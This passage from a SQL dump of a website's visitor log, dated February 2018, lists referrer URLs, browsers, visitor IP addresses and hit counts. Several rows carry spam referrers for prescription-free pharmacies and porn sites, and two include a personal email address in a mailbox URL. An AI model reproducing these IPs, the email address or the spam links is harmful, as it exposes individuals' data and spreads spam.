wn','','69.63.185.121','000',1,0),(25402,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.149','000',1,0),(25403,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',1,0),(25404,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',2,0),(25405,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.207','000',1,0),(25406,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',1,0),(25407,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',4,0),(25408,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(25409,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',1,0),(25410,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',4,0),(25411,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',2,0),(25412,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',2,0),(25413,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(25414,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',1,0),(25415,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',1,0),(25416,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.101','000',1,0),(25417,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(25418,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',1,0),(25419,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',1,0),(25420,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.25','000',1,0),(25421,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.209','000',1,0),(25422,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',2,0),(25423,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(25424,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',1,0),(25425,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.115','000',2,0),(25426,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',2,0),(25427,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.154','000',2,0),(25428,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',1,0),(25429,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.12','000',1,0),(25430,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.24','000',1,0),(25431,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.1','000',1,0),(25432,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.25','000',2,0),(25433,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.10','000',2,0),(25434,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.28','000',1,0),(25435,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',1,0),(25436,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',1,0),(25437,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',2,0),(25438,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(25439,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.73','000',1,0),(25440,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',2,0),(25441,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',2,0),(25442,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(25443,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',2,0),(25444,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(25445,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',2,0),(25446,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.98','000',1,0),(25447,'2018-02-26','https://www.google.com/','Safari','iPhone','11.0','','173.64.123.159','000',2,0),(25448,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',1,0),(25449,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',3,0),(25450,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',2,0),(25451,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',1,0),(25452,'2018-02-26','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.176','000',2,0),(25453,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',3,0),(25454,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',1,0),(25455,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(25456,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',1,0),(25457,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(25458,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(25459,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',2,0),(25460,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.182','000',2,0),(25461,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(25462,'2018-02-27','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','146.185.223.252','000',1,0),(25463,'2018-02-27','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','192.198.80.227','000',1,0),(25464,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.195','000',3,0),(25465,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',1,0),(25466,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(25467,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(25468,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(25469,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',1,0),(25470,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(25471,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',3,0),(25472,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',1,0),(25473,'2018-02-27','https://zphiblgz.org','Firefox','Windows','53.0','','184.94.240.92','000',2,0),(25474,'2018-02-27','https://zphiblgz.org','Firefox','Windows','26.0','','188.138.105.83','000',3,0),(25475,'2018-02-27','https://zphiblgz.org','Firefox','Windows','40.1','','122.55.52.68','000',1,0),(25476,'2018-02-27','http://aktau.xkaz.org/','MSIE','Windows','5.0','','134.249.48.151','000',1,0),(25477,'2018-02-27','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(25478,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.191.142','000',3,0),(25479,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.157.226','000',2,0),(25480,'2018-02-27','http://drugs-no-rx.info/','MSIE','Windows','6.0','','178.137.16.45','000',3,0),(25481,'2018-02-27','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(25482,'2018-02-27','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(25483,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',1,0),(25484,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',1,0),(25485,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',2,0),(25486,'2018-02-27','https://td-l-market.ru/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(25487,'2018-02-27','https://www.google.com/','Chrome','Windows','63.0.3239.132','','50.225.39.77','000',7,0),(25488,'2018-02-27','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',3,0),(25489,'2018-02-27','https://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','13.57.250.29','000',2,0),(25490,'2018-02-27','https://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','13.57.47.188','000',32,0),(25491,'2018-02-27','https://zphiblgz.org','Chrome','Linux','63.0.3205.0','','18.144.50.19','000',3,0),(25492,'2018-02-27','http://msu.kharkov.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(25493,'2018-02-27','http://www.inet-shop.su/','Opera','Windows','8.50','','134.249.48.151','000',1,0),(25494,'2018-02-27','https://kozhakoshek.com/','MSIE','Unknown','6.0','','134.249.48.151','000',2,0),(25495,'2018-02-27','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.46.85','000',2,0),(25496,'2018-02-27','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.10.107','000',1,0),(25497,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.172','000',3,0),(25498,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',2,0),(25499,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.210','000',1,0),(25500,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.115','000',1,0),(25501,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(25502,'2018-02-27','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','94.242.228.4','000',1,0),(25503,'2018-02-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','94.242.228.6','000',1,0),(25504,'2018-02-27','https://zphiblgz.org','Safari','Macintosh','6.2.7','','50.225.39.77','000',6,0),(25505,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',1,0),(25506,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',4,0),(25507,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(25508,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.54','000',1,0),(25509,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',1,0),(25510,'2018-02-27','https://zphiblgz.org','Firefox','Windows','56.0','','192.198.80.227','000',2,0),(25511,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.209','000',2,0),(25512,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',1,0),(25513,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',1,0),(25514,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',1,0),(25515,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(25516,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',2,0),(25517,'2018-02-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(25518,'2018-02-27','https://www.google.com/','Chrome','Windows','64.0.3282.186','','50.236.142.50','000',4,0),(25519,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.53','000',3,0),(25520,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',1,0),(25521,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.209','000',1,0),(25522,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.65','000',1,0),(25523,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.87','000',2,0),(25524,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',1,0),(25525,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',4,0),(25526,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',1,0),(25527,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',2,0),(25528,'2018-02-27','https://www.google.com/','Chrome','Windows','63.0.3239.132','','150.148.14.148','000',2,0),(25529,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',3,0),(25530,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.164','000',1,0),(25531,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(25532,'2018-02-27','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','71.121.232.125','000',4,0),(25533,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',1,0),(25534,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',2,0),(25535,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',3,0),(25536,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',1,0),(25537,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',1,0),(25538,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(25539,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(25540,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',1,0),(25541,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(25542,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',1,0),(25543,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',1,0),(25544,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',2,0),(25545,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',2,0),(25546,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.113','000',1,0),(25547,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',1,0),(25548,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',1,0),(25549,'2018-02-27','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwjgguml1sbZAhUH_IMKHRLTD5oQjRx6BAgAEAY&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw1CU46UrbyPp5sQemEM73D6&ust=1519839343943921','MSIE','Windows','11.0','','198.209.225.230','000',2,0),(25550,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',1,0),(25551,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.208','000',3,0),(25552,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.80','000',1,0),(25553,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',2,0),(25554,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.197','000',1,0),(25555,'2018-02-27','http://pornosemki.info/','MSIE','Windows','6.0','','134.249.48.151','000',1,0),(25556,'2018-02-27','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1710.beQyvpnphg3juERp6_mXq-7Uka5uL0p10nB2DYsOYUXg-lqUqEnQ1LtvZHwVNMPN.d612418c3fe2cf0cdf49c84b1c28c62e27a57a3b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZktISjdwX25aQnloWk0yOG40TWhCbFdkOXNNb0ZpRHNxY2d3Mk0tdGwxV2tUd0hvdjgwbTRhVQ&b64e=2&sign=ba328d96a8b62418ed9583188cf7943e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTAbGXuMLz0HTqmcIxzG8yBGD8ikSAWmbYVQ1ijsYvlolZEXOdApsTYBBYoLhEpHmFpBlqSrbhZfg4YWUoFQQ5g_6W8dZTejhqQuWSqaDGulPeY0N4PnfTWA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4Tn4k87_woFumCR5_U4Yu4RUk_lRYZac0ABcwtqwR56sbdQZriuEqFbNc1_pm3LHlw&l10n=ru&cts=1519754090473&mc=2.11287767768','MSIE','Windows','10.0','','188.32.230.5','000',1,0),(25557,'2018-02-27','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.73','000',2,0),(25558,'2018-02-27','https://zphiblgz.org','MSIE','Windows','8.0','','77.105.200.174','000',2,0),(25559,'2018-02-27','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(25560,'2018-02-27','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(25561,'2018-02-27','http://rieltor.crimea.ua/','MSIE','Windows','6.0','','46.118.125.21','000',3,0),(25562,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',4,0),(25563,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.83','000',2,0),(25564,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.224','000',1,0),(25565,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.77','000',1,0),(25566,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.214.223','000',2,0),(25567,'2018-02-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(25568,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',2,0),(25569,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(25570,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',2,0),(25571,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.71','000',1,0),(25572,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.25','000',1,0),(25573,'2018-02-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(25574,'2018-02-27','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(25575,'2018-02-27','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(25576,'2018-02-27','https://search.yahoo.com/','Chrome','Windows','64.0.3282.186','','69.195.247.116','000',2,0),(25577,'2018-02-27','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.179','000',1,0),(25578,'2018-02-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(25579,'2018-02-27','https://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','71.163.63.195','000',1,0),(25580,'2018-02-27','https://zphiblgz.org/ts_teams/linda-brigmon/','AppleWebKit','Windows','534','','40.77.177.113','000',1,0),(25581,'2018-02-27','https://zphiblgz.org/','Chrome','Android','64.0.3282.137','','174.205.14.13','000',1,0),(25582,'2018-02-27','https://cryptoswap.biz/','MSIE','Windows','6.0','','46.118.116.121','000',3,0),(25583,'2018-02-27','https://zphiblgz.org','Safari','Macintosh','11.0.3','','76.100.49.104','000',3,0),(25584,'2018-02-27','https://zphiblgz.org','Firefox','Linux','51.0','','54.203.117.187','000',2,0),(25585,'2018-02-27','https://zphiblgz.org','Firefox','Windows','51.0','','52.36.76.239','000',2,0),(25586,'2018-02-27','https://zphiblgz.org','Firefox','Windows','47.0','','35.166.252.92','000',2,0),(25587,'2018-02-27','https://zphiblgz.org','Firefox','Linux','50.0','','34.216.81.80','000',2,0),(25588,'2018-02-27','https://zphiblgz.org','Firefox','Macintosh','49.0','','54.244.204.182','000',2,0),(25589,'2018-02-27','https://zphiblgz.org','Firefox','Linux','54.0','','34.217.125.148','000',2,0),(25590,'2018-02-27','https://zphiblgz.org','Firefox','Linux','49.0','','54.190.1.147','000',2,0),(25591,'2018-02-27','https://zphiblgz.org','Firefox','Windows','49.0','','34.217.210.48','000',2,0),(25592,'2018-02-27','https://www.google.com/','Chrome','Macintosh','64.0.3282.140','','68.100.56.217','000',1,0),(25593,'2018-02-27','https://zphiblgz.org','uipbot','Unknown','1.0','','54.209.8.63','000',1,0),(25594,'2018-02-27','https://zphiblgz.org','Safari','iPad','11.0','','73.213.27.103','000',2,0),(25595,'2018-02-27','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.73.70','000',19,0),(25596,'2018-02-27','https://zphiblgz.org/scholarship/application/','Firefox','Windows','31.0','','46.161.9.56','000',3,0),(25597,'2018-02-27','https://pills24h.com/buy-celebrex-online-without-prescription/','MSIE','Unknown','7.0b','','46.118.125.21','000',1,0),(25598,'2018-02-27','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','68.134.12.220','000',2,0),(25599,'2018-02-27','https://zphiblgz.org','SamsungBrowser','Android','6.4','','172.58.184.182','000',2,0),(25600,'2018-02-27','http://online-sbank.ru/','MSIE','Windows','6.0','','46.119.114.157','000',2,0),(25601,'2018-02-27','http://m.facebook.com/','Chrome','Android','64.0.3282.137','','73.39.133.197','000',1,0),(25602,'2018-02-27','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.73','000',2,0),(25603,'2018-02-27','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','52.165.166.139','000',1,0),(25604,'2018-02-27','https://www.google.com/','Chrome','Windows','63.0.3239.132','','104.12.110.72','000',1,0),(25605,'2018-02-28','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(25606,'2018-02-28','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','173.234.249.64','000',1,0),(25607,'2018-02-28','http://lerporn.info/','MSIE','Windows','5.5','','178.159.37.55','000',3,0),(25608,'2018-02-28','http://zphiblgz.org/','Chrome','Macintosh','48.0.2564.109','','188.165.4.128','000',3,0),(25609,'2018-02-28','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.66','000',1,0),(25610,'2018-02-28','https://zphiblgz.org/','Opera Next','Windows','44.5.0188.6451','','212.83.191.0','000',1,0),(25611,'2018-02-28','https://zphiblgz.org','Firefox','Windows','40.1','','146.88.66.50','000',2,0),(25612,'2018-02-28','http://headpharmacy.com/','Unknown','Unknown','Unknown','','46.119.114.157','000',3,0),(25613,'2018-02-28','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','64.0.3282.167','','71.121.235.184','000',1,0),(25614,'2018-02-28','http://makler.org.ua/','MSIE','Windows','7.0a1','','46.118.116.121','000',2,0),(25615,'2018-02-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(25616,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','154.127.60.92','000',1,0),(25617,'2018-02-28','https://www.google.com/','Chrome','Windows','64.0.3282.186','','50.225.39.74','000',2,0),(25618,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.25','000',1,0),(25619,'2018-02-28','https://r.search.yahoo.com/_ylt=AwrEwNgIoJZa.CcA2MEnnIlQ;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1519849608/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=a6pJL4sgejOMkBkbW.Xk4VDkgyE-','Firefox','Windows','41.0','','50.225.39.84','000',8,0),(25620,'2018-02-28','http://site.ru','Chrome','Windows','5.0.375.99','','89.31.140.30','000',1,0),(25621,'2018-02-28','http://site.ru','Chrome','Windows','5.0.375.99','','89.31.140.31','000',1,0),(25622,'2018-02-28','https://www.google.com/','Chrome','Android','63.0.3239.111','','174.226.130.73','000',3,0),(25623,'2018-02-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(25624,'2018-02-28','https://zphiblgz.org','Safari','iPad','11.0','','50.225.39.87','000',19,0),(25625,'2018-02-28','https://www.google.com/','Chrome','Windows','64.0.3282.186','','50.225.39.87','000',4,0),(25626,'2018-02-28','http://zphiblgz.org','Chrome','Windows','62.0.3202.94','','71.221.13.74','000',4,0),(25627,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','64.27.17.140','000',1,0),(25628,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.130.183.184','000',1,0),(25629,'2018-02-28','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.88','000',4,0),(25630,'2018-02-28','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(25631,'2018-02-28','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(25632,'2018-02-28','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(25633,'2018-02-28','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.30','000',1,0),(25634,'2018-02-28','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(25635,'2018-02-28','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(25636,'2018-02-28','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(25637,'2018-02-28','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.74','000',8,0),(25638,'2018-02-28','https://zphiblgz.org','Edge','Windows','15.15063','','71.121.163.209','000',2,0),(25639,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.32.147.150','000',1,0),(25640,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.128.222.30','000',3,0),(25641,'2018-02-28','https://pills24h.com/buy-synthroid-levothyroxine-online-without-prescription/','Opera','Windows','9.0','','46.118.125.21','000',1,0),(25642,'2018-02-28','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.27','000',1,0),(25643,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.163','000',1,0),(25644,'2018-02-28','https://happysong.ru/','Opera','Windows','9.01','','178.159.37.55','000',3,0),(25645,'2018-02-28','https://zphiblgz.org','Firefox','Windows','40.1','','137.103.35.117','000',2,0),(25646,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.5','000',2,0),(25647,'2018-02-28','http://site.ru','Chrome','Windows','5.0.375.99','','80.87.203.2','000',2,0),(25648,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','5.188.10.8','000',1,0),(25649,'2018-02-28','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(25650,'2018-02-28','http://zphiblgz.org/','MSIE','Windows','11.0','','173.244.44.40','000',1,0),(25651,'2018-02-28','https://zphiblgz.org','Chrome','Unknown','64.0.3264.0','','138.197.71.220','000',3,0),(25652,'2018-02-28','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.22','000',1,0),(25653,'2018-02-28','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.147','000',1,0),(25654,'2018-02-28','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.95','000',1,0),(25655,'2018-02-28','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(25656,'2018-02-28','https://zphiblgz.org','MSIE','Windows','8.0','','50.19.154.226','000',1,0),(25657,'2018-02-28','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.182.200','000',11,0),(25658,'2018-02-28','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Chrome','Android','38.0.1025.166','','87.115.44.165','000',1,0),(25659,'2018-02-28','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Chrome','Android','61.0.3116.0','','196.54.55.17','000',1,0),(25660,'2018-02-28','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.175.228','000',7,0),(25661,'2018-02-28','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.175.187','000',6,0),(25662,'20